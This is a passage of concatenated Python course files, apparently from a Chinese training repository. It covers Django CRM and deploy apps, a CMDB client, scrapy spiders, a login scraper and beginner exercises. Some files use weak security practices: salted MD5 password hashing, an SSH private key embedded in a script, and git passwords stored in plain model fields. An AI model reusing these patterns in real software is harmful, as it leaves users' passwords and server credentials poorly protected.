path.rsplit('.',maxsplit=1) module = importlib.import_module(module_path) return getattr(module,cls_name)<file_sep>/cmdb/auto_client - 7 - 资产信息入库/src/plugins/basic.py #!/usr/bin/env python # -*- coding:utf-8 -*- import traceback from .base import BasePlugin from lib.response import BaseResponse from lib.log import logger class Basic(BasePlugin): def os_platform(self,handler, hostname): """ 获取系统平台 :return: """ output = handler.cmd('uname',hostname) return output.strip() def os_version(self,handler, hostname): """ 获取系统版本 :return: """ output = handler.cmd('cat /etc/issue',hostname) result = output.strip().split('\n')[0] return result def os_hostname(self,handler, hostname): """ 获取主机名 :return: """ output = handler.cmd('hostname',hostname) return output.strip() def win(self, handler, hostname): raise NotImplementedError('win must be implemented ') def linux(self, handler, hostname): response = BaseResponse() try: if self.debug: ret = { 'os_platform':'linux', 'os_version':'6.5', 'hostname':'c1.com' } else: ret = { 'os_platform': self.os_platform(handler, hostname), 'os_version': self.os_version(handler, hostname), 'hostname': self.os_hostname(handler, hostname), } response.data = ret except Exception as e: msg = traceback.format_exc() response.status = False response.error = msg logger.error(msg) return response.dict <file_sep>/day4/递归函数.py # def func(): # print(1) # func() # # func() # 997 /998 # import sys # def foo(n): # print(n) # n += 1 # foo(n) # foo(1) # 6! # print(6*5*4*3*2*1) def fn(n): if n == 1: return 1 return n * fn(n - 1) print(fn(6)) # 递归 就是自己调用自己 # 递归需要有一个停止的条件 # def fn(6): # if 6 == 1:return 1 # return 6*fn(5) # print(fn(6)) # # def fn(5): # return 5*fn(4) # # def fn(4): # return 4*fn(3) # # def fn(3): # return 3*fn(2) # # def fn(2): # return 2*fn(1) # # def fn(1): # return 1<file_sep>/day23/auto - 2 - 固定二级菜单示例/web/templatetags/ooxx.py from django.template import Library from django.conf import settings import copy import re register = Library() # 定义一个函数 # @register.simple_tag() # def show_menu(a): # return '999' @register.inclusion_tag('menu.html') def get_menu(request): ''' 获取菜单 :param request: :return: ''' new_menu_list = copy.deepcopy(settings.MENU_LIST) flag = False for item in new_menu_list: # item就是menu_list里面的一级菜单 for child in item['children']: # 循环children里面的菜单 [个人中心,添加用户,....] reg="^{0}$".format(child['url']) # ^/web/user/1/$ if re.match(reg,request.path_info): #如果请求的菜单和正则匹配 if child['is_menu']: # 如果是true child['class'] = 'active' # 子类class ,如果匹配上就让目录的class=active else: index=child['parent_index'] # 关联菜单,找出要选中菜单的索引 item['children'][index]['class']='active' # 找到这个菜单的索引,然后选中及加上active item['class'] = '' # 父 类class 就是hide flag = True break if flag: break return {'menu_list': new_menu_list} # 把new_menu_list传给menu里面的代码 <file_sep>/day4/优秀的作业/优秀的作业/胡宁飞/员工信息表作业/作业.py ##博客 http://www.cnblogs.com/huningfei/p/8931518.html ## http://www.cnblogs.com/huningfei/p/8920759.html import os from tabulate import tabulate#安装打印模块的表格 ##打印支持的语句 with open('sentence',encoding='utf-8',mode='r')as f1: print('\033[1;33m目前支持的语句有: \n %s\033[0m' % f1.read()) TITLE=['id','name','age','phone','job'] def zhuanhan():##转换数据 with open('userinfo',encoding='utf-8',mode='r') as f1: dic = {} for i in TITLE: dic[i] = [] #print(dic) for line in f1: pid,name,age,phone,job = line.split(",") dic['id'].append(pid) dic['name'].append(name) dic['age'].append(age) dic['phone'].append(phone) dic['job'].append(job) return dic def gt(a,b): ''' :param a: age :param b: 22 :return: ''' match_list =[] for index,val in enumerate(dic[a]): ##age[22,23,]并求出age的各个索引 if int(val) > int(b): ##匹配上了 # print("match",val) onwer_list=[] for col in TITLE: onwer_list.append(dic[col][index]) match_list.append(onwer_list) #print("查询到的数据:",match_list) return match_list def lt(a,b): match_list = [] for index, val in enumerate(dic[a]): ##age[22,23,]并求出age的各个索引 if int(val) < int(b): ##匹配上了 # print("match",val) onwer_list = [] for col in TITLE: onwer_list.append(dic[col][index]) match_list.append(onwer_list) # print("查询到的数据:",match_list) return match_list def eq(a,b): match_list = [] for index, val in enumerate(dic[a]): ##a代表age , age[22,23,]并求出age的各个索引 if str(val.strip()) == str(b.strip()): ##匹配上了 onwer_list = [] for col in TITLE: onwer_list.append(dic[col][index]) match_list.append(onwer_list) # print("查询到的数据:",match_list) return match_list def op_like(a,b): match_list = [] for index, val in enumerate(dic[a]): ##age[22,23,]并求出age的各个索引 if b in val: ##匹配上了 # print("match",val) onwer_list = [] for col in TITLE: onwer_list.append(dic[col][index]) match_list.append(onwer_list) return match_list def check_where(right_yuju): tiaojian = { '>':gt, '<':lt, '=':eq, 'like':op_like, } for fu_hao,value in tiaojian.items(): #print(value) if fu_hao in right_yuju: a,b = right_yuju.split(fu_hao)#a和b接受到了age和22 a是key b是value matched_data = value(a.strip(),b.strip()) #print(matched_data) return matched_data else: print('where语法错误') ''' 解析where条件,判断大于,小于,等于和like :return: age>22 ''' def select(match_data,left_yuju): """ ##这个只是可以查看name和age的语句 :param match_data:[['2', 'Egon', '23', '13304320533', 'Tearcher\n'], ['3', 'nezha', '25', '1333235322', 'IT']] :param left_yuju: select name, age from userinfo :return: """ filter_cols_tmp = left_yuju.split('from')[0].split()[1:] #取出name,和age 例:[' name', ' age '] filter_cols = [i.strip().strip(",") for i in filter_cols_tmp] ##取出干净的name和age reformat_data_set = [] ##最终要打印的数据 if "*" in filter_cols: filter_cols = TITLE # [id,age,name,phone,job] for row in match_data: ##row是['3', 'nezha', '25', '1333235322', 'IT'] filtered_vals=[] ##['Egon', '23'] ['nezha', '25'] for col in filter_cols: ##col是name和age col_index = TITLE.index(col) ##name和age在title里面的索引1和2的位置 filtered_vals.append(row[col_index])#['3', 'nezha', '25', '1333235322', 'IT'][1] reformat_data_set.append(filtered_vals) print(tabulate(reformat_data_set, headers=TITLE, tablefmt="grid")) else: # filter_cols = TITLE # [id,age,name,phone,job] for row in match_data: ##row是['3', 'nezha', '25', '1333235322', 'IT'] filtered_vals = [] ##['Egon', '23'] ['nezha', '25'] for col in filter_cols: ##col是name和age col_index = TITLE.index(col) ##name和age在title里面的索引1和2的位置 filtered_vals.append(row[col_index]) # ['3', 'nezha', '25', '1333235322', 'IT'][1] reformat_data_set.append(filtered_vals) print(tabulate(reformat_data_set, headers=TITLE, tablefmt="grid")) def check_input(cmd): ## 检测输入的语句,并分割成两个语句(cmd是从用户输入的命令传过来的) """ :param cmd: select name, age where age>22 :return: """ syntax_list={ 'select':select, 'update':update, 'add':insert, 'delete':delete } if 'where' not in cmd and 'insert' not in cmd:## 这个是select * from userinfo 查询所有 zhuanhan() print(tabulate(dic, headers=TITLE, tablefmt="grid")) else: if cmd.split()[0] in ('select','update','delete',):#取出用户输入的第一个命令 left_yuju,right_yuju = cmd.split('where')#以where关键字分割语句 matched_data=check_where(right_yuju)#把where后面的语句传送给了check_where #print(matched_data) syntax_list[cmd.split()[0]](matched_data,left_yuju) # select update inst select() res = dic # update_file(res) elif cmd.split()[0] == 'insert': insert(cmd) else: print("语法错误") def insert(cmd): ''' :param cmd: 如:insert into userinfo id,name,age,phone,job values 5,jinxing,43,123456789,python :return: ''' filter_values = cmd.split('values')[-1].split(',') ##5,jinxing,43,123456789,python insert_file(filter_values) def update(match_data,left_yuju): ''' :param match_data: ['3', 'nezha', '25', '1333235322', 'IT'] ['4', 'hnf', '25', '1333235322', 'IT'] :param left_yuju: update name='bob' from userinfo :return: ''' print('影响了%s行' %(len(match_data))) filter_cols = left_yuju.split('from')[0].split()[1].split('=') #取出['name', 'bob'] for line in match_data: line_id = line[0] #取出id index = dic["id"].index(line_id)##取出id在上面字典里的索引 dic[filter_cols[0]][index] = filter_cols[1] #dic[filter_cols[0]] #获取出所有的名字,然后在获取名字对应的索引 update_file(dic) #return dic def delete(match_data,left_yuju): print('影响了%s行' %(len(match_data))) filter_cols = left_yuju.split('from')[0].split()[1].split('=') for del_line in match_data: line_id = del_line[0] # 取出id index = dic["id"].index(line_id) ##取出id在上面字典里的索引 dic.get("id").pop(index) dic.get("name").pop(index) dic.get("age").pop(index) dic.get("phone").pop(index) dic.get("job").pop(index) #print(dic) delete_file(dic) def insert_file(filter_values): ''' :param filter_values: [6, 'hnf', '23', '123456789', 'python'] :return: ''' global dic with open('userinfo', encoding='utf-8', mode='a+') as f1: n = 0 for i in filter_values: n += 1 if n == 1: i = int(dic.get('id')[-1]) + 1 f1.write(str(i)+',') elif 1< n < 5: f1.write(i.strip() + ',') else: f1.write(i + "\n") print("添加完毕") f1.seek(2) def delete_file(dic): ''' :param dic:从文件读取的数据{'id': ['1', '2', '3'], 'name': ['Alex', 'Egon', 'wusir'], 'age': ['23', '24', '35'], 'phone': ['13651054608', '13304320533', '1333235322'], 'job': ['IT\n', 'Tearcher\n', 'IT']} :return: ''' list_id = dic.get('id') list_name = dic.get('name') list_age = dic.get('age') list_phone = dic.get('phone') list_job = dic.get('job') list_data = zip(list_id, list_name, list_age, list_phone, list_job) for i in list_data: with open('userinfo.bak',encoding='utf-8',mode="a")as f1: str_i=",".join(i) #print(str_i) f1.write(str_i) os.remove('userinfo') os.rename("userinfo.bak","userinfo") def update_file(dic): list_id = dic.get('id') list_name = dic.get('name') list_age = dic.get('age') list_phone = dic.get('phone') list_job = dic.get('job') a = zip(list_id, list_name,list_age, list_phone, list_job) for i in a: with open("userinfo.bak", "a", encoding="utf-8") as f1: str_i = ",".join(i) #print(str_i) f1.write(str_i) os.remove("userinfo") os.rename('userinfo.bak','userinfo') ##输入语句 def yuju(): while True: global dic dic = zhuanhan() cmd = input("mysql>>:").strip()#cmd就是指用户开始输入的语句 if not cmd: continue check_input(cmd) ##传给检测你输入语句的函数 yuju()<file_sep>/day21/CMS/fault_reporting/admin.py from django.contrib import admin from fault_reporting import models # Register your models here. admin.site.register(models.UserInfo) admin.site.register(models.FaultReport) admin.site.register(models.Tag) admin.site.register(models.Comment) admin.site.register(models.UpDown) admin.site.register(models.Fault2Tag) admin.site.register(models.FaultDetail) admin.site.register(models.LOB)<file_sep>/auto_client/bin/run.py import sys import os import importlib # 可以导入字符串模块 os.environ['AUTO_CLIENT_SETTINGS'] = "conf.settings" # 设置环境变量 BASEDIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.append(BASEDIR) # from src.plugins import func # 函数版 # from src.plugins import PluginManager # 类版 from src import script if __name__ == '__main__': script.start() # obj = PluginManager() # 实例化一个对象 # server_dict = obj.exec_plugin() # 执行PluginManager类里面的一个exec_plugin方法 # print(server_dict) <file_sep>/deploy/test.py import os import sys import shutil from subprocess import check_output, check_call, CalledProcessError from zipfile import ZipFile CODE_BASE_PATH = r"C:\Users\Administrator\Desktop\deploy\codes" WEB_BASE_PATH = r"C:\Users\Administrator\Desktop\deploy\codes" def unpack_zipfile(proect_name, version, file_name): """ :param proect_name: :param version: :param file_name: :return: """ zip_file_path = os.path.join(CODE_BASE_PATH, proect_name, version, file_name) print(zip_file_path) web_file_path = os.path.join(CODE_BASE_PATH, proect_name, version, file_name.split('.')[0]) print(web_file_path) shutil.unpack_archive(zip_file_path, extract_dir=web_file_path, format='zip') def run(): project_name = sys.argv[1] version = sys.argv[2] file_name = sys.argv[3] unpack_zipfile(project_name, version, file_name) if __name__ == '__main__': run()<file_sep>/deploy/web/models.py from django.db import models class UserInfo(models.Model): """ 用户表 """ username = models.CharField(verbose_name='用户名', max_length=32) password = models.CharField(verbose_name='密码', max_length=64) server_name = models.CharField(verbose_name='SSH用户名', max_length=32) server_private_key = models.TextField(verbose_name='SSH私钥') git_name = models.CharField(verbose_name='git用户名', max_length=32) git_pwd = models.CharField(verbose_name='git密码', max_length=32) class Host(models.Model): """ 主机表 """ hostname = models.CharField(verbose_name='主机名', max_length=32) ssh_port = models.IntegerField(verbose_name='SSH端口') # Deploy = models.ForeignKey(verbose_name='发布任务', to='Deploy',null=True) def __str__(self): return self.hostname class Department(models.Model): """ 部门表 """ title = models.CharField(verbose_name='部门', max_length=32) def __str__(self): return self.title class Project(models.Model): """ 项目表 """ depart = models.ForeignKey(verbose_name='部门', to='Department') title = models.CharField(verbose_name='项目名称', max_length=32) git = models.CharField(verbose_name='仓库地址', max_length=128) private = models.BooleanField(verbose_name='是否私有', default=True) online_path = models.CharField(verbose_name='线上项目路径', max_length=128) hosts = models.ManyToManyField(verbose_name='关联主机', to='Host') class Deploy(models.Model): """ 部署任务表 例如: 1 0.11 2 1.10 1 0.12 """ project = models.ForeignKey(verbose_name='项目', to='Project') version = models.CharField(verbose_name='版本', max_length=32) uid = models.CharField(verbose_name='上线文件包名称', max_length=32, null=True, blank=True) status_choice = ( (1, '未获取'), (2, '待发布'), (3, '已发布'), (4, '已回滚'), ) status = models.IntegerField(verbose_name='状态', choices=status_choice, default=1) script = models.ForeignKey(verbose_name='script', to='Script', null=True, blank=True) class DeployRecord(models.Model): """ 服务器部署记录 """ deploy = models.ForeignKey(verbose_name='部署任务', to='Deploy') host = models.ForeignKey(verbose_name='主机', to='Host') host_version = models.CharField(verbose_name='版本', max_length=32,null=True) status_choice = ( (1, '发布中'), (2, '成功'), (3, '失败'), ) status = models.IntegerField(verbose_name='状态', choices=status_choice, default=1) deploy_time = models.DateTimeField(verbose_name='部署时间', auto_now_add=True) log = models.TextField(verbose_name='日志') class RollbackRecord(models.Model): """ 服务器部署记录 """ deploy = models.ForeignKey(verbose_name='部署任务', to='Deploy') host = models.ForeignKey(verbose_name='主机', to='Host') host_version = models.CharField(verbose_name='版本', max_length=32,null=True) status_choice = ( (1, '发布中'), (2, '成功'), (3, '失败'), ) status = models.IntegerField(verbose_name='状态', choices=status_choice, default=1) deploy_time = models.DateTimeField(verbose_name='部署时间', auto_now_add=True) rollback_log = models.TextField(verbose_name='日志') class Script(models.Model): """ script """ title = models.CharField(verbose_name='标题', max_length=128) interpreter_choices = { ('py', 'python3'), ('sh', 'bash') } interpreter = models.CharField(verbose_name='解释器', choices=interpreter_choices, default='py', max_length=16) code = models.TextField(verbose_name='上传脚本') rollback_code = models.TextField(verbose_name='回滚脚本',null=True) def __str__(self): return self.title <file_sep>/deploy/web/views/host.py from django.shortcuts import render,HttpResponse,redirect from web.forms.host import HostModelForm from web import models from web.utils.pager import Pagination from web.utils.urls import memory_reverse def host_list(request): """ 部门列表 :param request: :return: """ # 要查看的页码 page = request.GET.get('page', 1) # 数据库中数据总条数 total_count = models.Host.objects.all().count() # 数据库中获取即可 pager = Pagination(page,total_count,request.path_info) depart_queryset = models.Host.objects.all()[pager.start :pager.end] return render(request,'host_list.html',{'depart_queryset':depart_queryset,'pager':pager}) def host_add(request): """ 添加部门 :param request: :return: """ if request.method == 'GET': form = HostModelForm() return render(request, 'form.html', {'form':form}) form = HostModelForm(data=request.POST) # 对用户提交的数据进行校验 if form.is_valid(): form.save() return redirect(memory_reverse(request,'host_list')) return render(request, 'form.html', {'form': form}) def host_edit(request,nid): """ 编辑部门 :param request: :param nid: 当前要编辑的部门ID :return: """ obj = models.Host.objects.filter(id=nid).first() # 包含此行的所有数据 if request.method == "GET": # 生成HTML标签 + 携带默认值 form = HostModelForm(instance=obj) return render(request,'form.html',{'form':form}) # 带默认值 form = HostModelForm(data=request.POST,instance=obj) if form.is_valid(): form.save() return redirect(memory_reverse(request,'host_list')) return render(request, 'form.html', {'form': form}) def host_del(request,nid): """ 删除部门 :param request: :param nid: :return: """ origin = memory_reverse(request,'host_list') if request.method == 'GET': return render(request, 'delete.html', {'cancel': origin}) models.Host.objects.filter(id=nid).delete() return redirect(origin)<file_sep>/day26/scrapy框架/first/first/spiders/qiushi.py # -*- coding: utf-8 -*- import scrapy class QiushiSpider(scrapy.Spider): name = 'qiushi' # allowed_domains = ['www.aa.com'] start_urls = ['https://www.qiushibaike.com/'] def parse(self, response): # xpath为response中的方法,可以将xpath表达式直接作用于该函数中 odiv = response.xpath('//div[@id="content-left"]/div') content_list = [] # 用于存储解析到的数据 for div in odiv: # xpath函数返回的为列表,列表中存放的数据为Selector类型的数据。我们解析到的内容被封装在了Selector对象中,需要调用extract()函数将解析的内容从Selecor中取出。 author = div.xpath('.//div[@class="author clearfix"]/a/h2/text()')[0].extract() content = div.xpath('.//div[@class="content"]/span/text()').extract() print(content) # 将解析到的内容封装到字典中 dic = { '作者': author, '内容': content } # 将数据存储到content_list这个列表中 content_list.append(dic) return content_list # 运行方法在cmd里面,进去你所建的那个项目, # 执行输出指定格式进行存储:将爬取到的数据写入不同格式的文件中进行存储 # scrapy crawl qiubai -o qiubai.json # scrapy crawl qiubai -o qiubai.xml # scrapy crawl qiubai -o qiubai.csv # #持久化存储方式: # #1.基于终端指令:必须保证parse方法有一个可迭代类型对象的返回 ,content_list就是一个科迭代的 # #2.基于管道<file_sep>/day26/scrapy框架/daili/daili/spiders/dailiip.py # -*- coding: utf-8 -*- # 开启代理的流程: # 1 在setting里面开启下载中间件 ''' DOWNLOADER_MIDDLEWARES = { 'daili.middlewares.DailiDownloaderMiddleware': 543, } ''' # 2 在middlewares里面写上代理 ''' def process_request(self, request, spider): # request参数表示的就是拦截到的请求对象 request.meta['proxy'] = "https://172.16.17.32:1080" ''' import scrapy class DailiipSpider(scrapy.Spider): name = 'dailiip' # allowed_domains = ['www.xx.com'] start_urls = ['https://www.baidu.com/s?wd=ip'] def parse(self, response): page_text = response.text with open('./daili.html', 'w', encoding='utf-8') as fp: fp.write(page_text) <file_sep>/day27/s21crm/crm/views/logout.py from django.shortcuts import render, redirect from django.urls import reverse from crm import models from crm.pwd.md5 import md5 from rbac.service.permission import init_permission from functools import wraps # session 登录装饰器 def login_check(func): @wraps(func) def inner(request, *args, **kwargs): next_url = request.path_info if request.session.get('user'): return func(request, *args, **kwargs) else: return redirect("/login/?next_url={}".format(next_url)) return inner # 注销页面 @login_check def logout(request): # 删除所有当前请求相关的session request.session.delete() return redirect("/login/") <file_sep>/day25/爬取豆瓣网post请求.py # 必须先登录,然后去浏览器里面--network---找到登录页面--login--headers,查看参数在formdata里面 # Doubai123 import requests url = 'https://accounts.douban.com/login' # post请求携带参数设置 data = { 'source': 'movie', 'redir': 'https://movie.douban.com/', # 登录成功之后跳转的页面 'form_email': '<EMAIL>', 'form_password': '<PASSWORD>', 'login': '登录', } # 自定义hearders headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' } # 请求 response = requests.post(url=url, data=data,headers=headers) # 获取响应数据 page_text = response.text # 持久化存储 with open('./doubai.html', 'w', encoding='utf-8') as f: f.write(page_text) <file_sep>/cmdb/auto_client - 7 - 资产信息入库/相关脚本/2.线程池.py #!/usr/bin/python # -*- coding:utf-8 -*- import time from concurrent.futures import ThreadPoolExecutor def task(host): """ 采集资产 :return: """ time.sleep(2) print(host) # 创建了一个线程池,线程池中最多放20个线程(20个我去采集资产) pool = ThreadPoolExecutor(20) for i in range(1,101): hostname = "c%s.com" %(i,) # 去线程池中申请一个线程去执行task函数 pool.submit(task,hostname)<file_sep>/day4/5.内置函数.py # 自定义函数 # 内置函数 # print # len # max min # dir # def func(): # a = 1 # b = 2 # print(locals()) # print(globals()) # 全局命名空间中的名字 # print(locals()) # 本地的命名空间 # print(globals()) # 全局的命名空间 # func() # inp = input('>>>') # 99乘法表 # for i in range(1,10): # for j in range(1,i+1): # print('%s * %s = %2s'%(i,j,i*j),end=' ') # print() # print(1,2,3,4,5,sep=';',end=' ') # print(1,2,3,4,5,sep=';',end='') # import time # for i in range(0,101,2): #0,2,4,6,8 # time.sleep(0.1) # char_num = i//2 #打印多少个'*' 4 # if i == 100: # per_str = '\r%s%% : %s\n' % (i, '*' * char_num) # else: # per_str = '\r%s%% : %s'%(i,'*'*char_num) # print(per_str,end='',flush=True) # 0.01 # print() 写文件 # python 能直接操作文件 —————— 需要发起系统调用 才能操作文件 # print(hash('1291748917')) # print(hash('1291748917')) #对可hash的数据类型进行hash之后会得到一个数字 # 在一次程序的执行过程中 对相同的可哈希变量 哈希之后的结果永远相同的 # 在一次程序的执行过程中 对不相同的可哈希变量 哈希之后的结果几乎总是不相同的 # hash 字典底层的存储 和set 集合的去重机制 都相关 # id() # callable 可调用 # def func():pass # a = 1 # print(callable(func)) # print(callable(a)) # print(dir('1')) # 查看一个变量所拥有的所有名字 # print(bin(10)) # print(oct(10)) # print(hex(10)) # 0123456789abcdef # print(abs(4)) # print(abs(-4)) # print(divmod(10,2)) # 商余函数 # print(divmod(7,3)) # 商余函数 # print(divmod(9,7)) # 商余函数 # 返回一个元组 # print(round(3.1415926,4)) # 默认取整,小数精确 会四舍五入 # print(pow(2,3,5)) # (2**3)%5 # print(pow(3,2,2)) # print(sum([1,2,3,4,5])) # print(sum([1,2,3,4,5],start=0)) # print(sum([1,2,3,4,5],start=20)) # print(sum(range(1,6))) # print(min([1,2,3,4,5])) # print(min(1,2,3,4)) # print(min(1,-2,3,-4)) # print(min(1,-2,3,-4,key=abs)) # def func(num): # return num%2 # print(min(-2,3,-4,key=func)) # ret = [1,2,3,4,5] # ret.reverse() # print(ret) # ret1 = reversed(ret) # ret2 = reversed((1,2,3,4,5)) # print(ret) # print(list(ret1)) # print(list(ret2)) # print(format('test', '<20')) # print(format('test', '>20')) # print(format('test', '^20')) # print(ord('a')) # 小写的a-z 97+26 A-Z 65+26 # print(chr(97)) # print(1) # print('1') # print(repr(1)) # print(repr('1')) # l = ['苹果','香蕉'] # # ret = enumerate(l,1) # 枚举 接收两个参数:一个容器类型,一个序号起始值 返回值:可迭代的 # # print(ret) # for num,item in enumerate(l,1): # print(num,item) # print(all([1,2,3,4,5])) # print(all([0,1,2,3,4,5])) # print(all(['a',1,2,3,4,5])) # print(all(['',1,2,3,4,5])) # print(any([0,None,False])) # ret = zip([1,2,3,4,5],('a','b','c','d'),(4,5)) #拉链方法 # print(ret) # for i in ret: # print(i) # lst = [1, 4, 6, 7, 9, 12, 17] # def func(num): # if num % 2 == 0:return True # filter(func,lst) # for i in filter(func,lst): # print(i) # g = (i for i in lst if i%2 == 0) # l = ['test', None, '', 'str', ' ', 'END'] # def func(item): # if item and item.strip():return True # for i in filter(func,l): # print(i) # [i**2 for i in range(10)] # def func(num): # return num ** 2 # for i in map(func,range(10)):print(i) # 排序功能 # l = [1,-4,-2,3,-5,6,5] # l.sort(key=abs) # print(l) # l = [1,-4,-2,3,-5,6,5] # new_l = sorted(l,key=abs,reverse=True) # print(new_l) # l = [[1,2],[3,4,5,6],(7,),'123'] # # print(sorted(l,key=len)) # eval() # eval('print(123)') # exec('print(123)') # print(eval('1+2-3*20/(2+3)')) # print(exec('1+2-3*20/(2+3)')) # 内置函数 # 标红的如果不会 # 标黄的 是能够节省你的代码 面试会用 # min max sorted filter map 面试明星知识点 # 你经常不见 且没被点名说重点的 就不用特别了解了 <file_sep>/day27/s21crm/crm/views/classes.py from django.shortcuts import render, redirect from crm import models from crm.forms.classes import ClassesModelForm from django.urls import reverse def classes_list(request): """ 部门列表 :param request: :return: """ queryset = models.ClassList.objects.all() return render(request, 'classes_list.html', {'queryset': queryset}) def classes_add(request): """ 部门添加 :param request: :return: """ if request.method == "GET": form = ClassesModelForm() return render(request, 'classes_add.html', {'form': form}) form = ClassesModelForm(data=request.POST) if form.is_valid(): form.save() return redirect('classes_list') else: return render(request, 'classes_add.html', {'form': form}) def classes_edit(request, nid): """ 编辑部门 :param request: :param nid: :return: """ obj = models.ClassList.objects.filter(id=nid).first() if request.method == "GET": form = ClassesModelForm(instance=obj) # 加上instance才能在编辑页面显示原来的数据 return render(request, 'classes_edit.html', {"form": form}) form = ClassesModelForm(data=request.POST, instance=obj) # data是把编辑好的数据提交过去 if form.is_valid(): form.save() return redirect('classes_list') else: return render(request, 'classes_edit.html', {"form": form}) def classes_del(request, nid): """ 删除用户 :param request: :param nid: :return: """ models.ClassList.objects.filter(id=nid).delete() return redirect('classes_list') <file_sep>/day27/s21crm/crm/pwd/md5.py import hashlib def md5(data): """ MD5加密 :param data: 要加密的字符串 :return: 加密后的字符串 """ hash = hashlib.md5(b'us9sdkfsdfj') hash.update(data.encode('utf-8')) return hash.hexdigest() <file_sep>/deploy/script/ssh.py import paramiko from io import StringIO key_str = """-----<KEY> tud<KEY>""" file_obj = StringIO(key_str) print(file_obj) private_key = paramiko.RSAKey(file_obj) transport = paramiko.Transport(('192.168.7.32', 22)) transport.connect(username='yx', pkey=private_key) ssh = paramiko.SSHClient() ssh._transport = transport stdin, stdout, stderr = ssh.exec_command('df') result = stdout.read() transport.close() print(result.decode()) <file_sep>/day7/三个装饰器函数.py ''' # property的用法 #第一种写法: from math import pi class Circle: def __init__(self,r): self.r=r def mj(self): return pi*self.r**2 def zc(self): return 2*pi*self.r c1=Circle(3) print(c1.mj()) #第二种写法:用property 将一个函数伪装成为属性 class Circle: def __init__(self,r): self.r=r @property def mj(self): return pi*self.r**2 @property def zc(self): return 2*pi*self.r c1=Circle(3) print(c1.mj) # property 跟__私有属性的结合 如:苹果打折的问题 class Goods(): def __init__(self,price,discount): self.__price=price self.discount=discount @property def price(self): #现有的价格 return self.__price * self.discount @price.setter #设置一个新的属性即新的价格 def price(self,newprice): self.__price=newprice @price.deleter #删除一个价格 def price(self): del self.__price apple=Goods(8,0.7) print(apple.price) apple.price=10 print(apple.price) print(apple.__dict__) del apple.price print(apple.__dict__) ''' # classmethod class Person: Country='中国人' @classmethod #把func变成了一个类方法 def func(cls): #cls指向了类的内存空间 print('当前角色的国家是%s' %cls.Country) alex=Person() alex.func() Person.func() #如果某一个类中的方法 并没有用到这个类的实例中的具体属性 # 只是用到了类中的静态变量 就使用类方法<file_sep>/cmdb/auto_client - 7 - 资产信息入库/src/script.py #!/usr/bin/python # -*- coding:utf-8 -*- import importlib from config import settings from lib.module_string import import_string def run(): """ 采集资产的入口 :return: """ # 'src.engine.agent.AgentHandler' engine_path = settings.ENGINE_HANDLERS.get(settings.ENGINE) cls = import_string(engine_path) obj = cls() obj.handler()<file_sep>/day15/作业/bin/start.py import sys import os sys.path.append(os.path.dirname(os.path.dirname(__file__))) from core import main if __name__ == '__main__': main.choice() <file_sep>/day5/作业1.py import re res = re.compile(r'\([^()]+\)') # 匹配最小单位的括号 input_filter = re.compile('[a-zA-Z]') def check_rede_and_except(s): ''' 检测表达式里面是否有乘除法 :param s: 传进来的计算表达式 :return: 返回一个没有乘除号的表达式 ''' l = re.findall('([\d\.]+|/|-|\+|\*)',s) # ['100.5', '+', '40', '*', '5', '/', '2', '-', '3', '*', '2', '*', '2', '/', '4', '+', '9'] while 1: if '*' in l and '/' not in l: ret = jisuan_rede_and_except(l, '*') elif '/' in l and '*' not in l: ret = jisuan_rede_and_except(l, '/') elif '/' in l and '*' in l: a = l.index('*') b = l.index('/') if a < b: ret = jisuan_rede_and_except(l, '*') else: ret = jisuan_rede_and_except(l, '/') else: break return jisuan_jia_and_jian(l) def jisuan_rede_and_except(l, x): ''' 计算乘除 :param l: 是带有乘除号的表达式 :param x: 除号或者乘号 :return: 返回一个没有乘除号的表达式 ''' a = l.index(x) if x == '*' and l[a + 1] != '-': k = float(l[a - 1]) * float(l[a + 1]) elif x == '/' and l[a + 1] != '-': k = float(l[a - 1]) / float(l[a + 1]) elif x == '*' and l[a + 1] == '-': k = -(float(l[a - 1]) * float(l[a + 2])) elif x == '/' and l[a + 1] == '-': k = -(float(l([a - 1])) / float(l[a + 2])) del l[a - 1], l[a - 1], l[a - 1] l.insert(a - 1, str(k)) return l #['100.5', '+', '100.0', '-', '3.0', '+', '9'] 上面的计算加减的函数接收到l def jisuan_jia_and_jian(l): ''' 计算加减 :param l: 是一个只含有加减号的表达式 :return: sum最终的计算结果 ''' sum = 0 while l: #l=['100.5', '+', '100.0', '-', '3.0', '+', '9'] i=1,3,5 if l[0] == '-': ##['-','1','+','2'] l[0] = l[0] + l[1] ##l[0]=-1 del l[1] # 把1删除 sum += float(l[0]) for i in range(1, len(l), 2): #取出l列表里面的加减符号 if l[i] == '+' and l[i + 1] != '-': sum += float(l[i + 1]) elif l[i] == '+' and l[i + 1] == '-': sum -= float(l[i + 2]) elif l[i] == '-' and l[i + 1] == '-': sum += float(l[i + 2]) elif l[i] == '-' and l[i + 1] != '-': sum -= float(l[i + 1]) break return sum def brackets(expression): ''' 检查是否有括号 :param expression: 用户输入的表达式 :return: 返回一个没有括号的表达式 ''' if not res.search(expression): # 匹配最里面的括号,如果没有的话,去检测是否有乘除号 return check_rede_and_except(expression) k = res.search(expression).group() # 取出最小括号里面的值 expression = expression.replace(k, str(check_rede_and_except(k[1:len(k) - 1]))) # 把刚才计算的式子替换成计算的结果eg:2*3 替换成6 ,直到没有括号为止 ''' expression结果: 1 - 2 * ( (60-30 +-5.0 * (9-2*5/3 + 7 /3*99/4*2998 +10 * 568/14 )) - (-4*3)/ (16-3*2) ) 1 - 2 * ( (60-30 +-5.0 * 173545.88095238098) - (-4*3)/ (16-3*2) ) 1 - 2 * ( -867699.4047619049 - (-4*3)/ (16-3*2) ) 1 - 2 * ( -867699.4047619049 - -12.0/ (16-3*2) ) 1 - 2 * ( -867699.4047619049 - -12.0/ 10.0 ) 1 - 2 * -867698.2047619049 ''' return brackets(expression) while True: # print("退出请按q\Q") s = input('请输入你想要计算的数字:') a = s.replace(' ', '') if input_filter.search(a) or a.count('(') != a.count(')'): print("你输入的表达式有误,请重新输入") continue if a=='': continue print(brackets(a)) <file_sep>/day17/s21/app01/migrations/0007_auto_20180815_1446.py # -*- coding: utf-8 -*- # Generated by Django 1.11.11 on 2018-08-15 06:46 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('app01', '0006_auto_20180814_1649'), ] operations = [ migrations.AlterField( model_name='host', name='hostname', field=models.CharField(max_length=32), ), ] <file_sep>/day5/递归.py ##算年龄 # def age(n): # if n == 3: # return 40 # else: # return age(n+1)+2 # print(age(3)) ##递归二分查找算法 l = 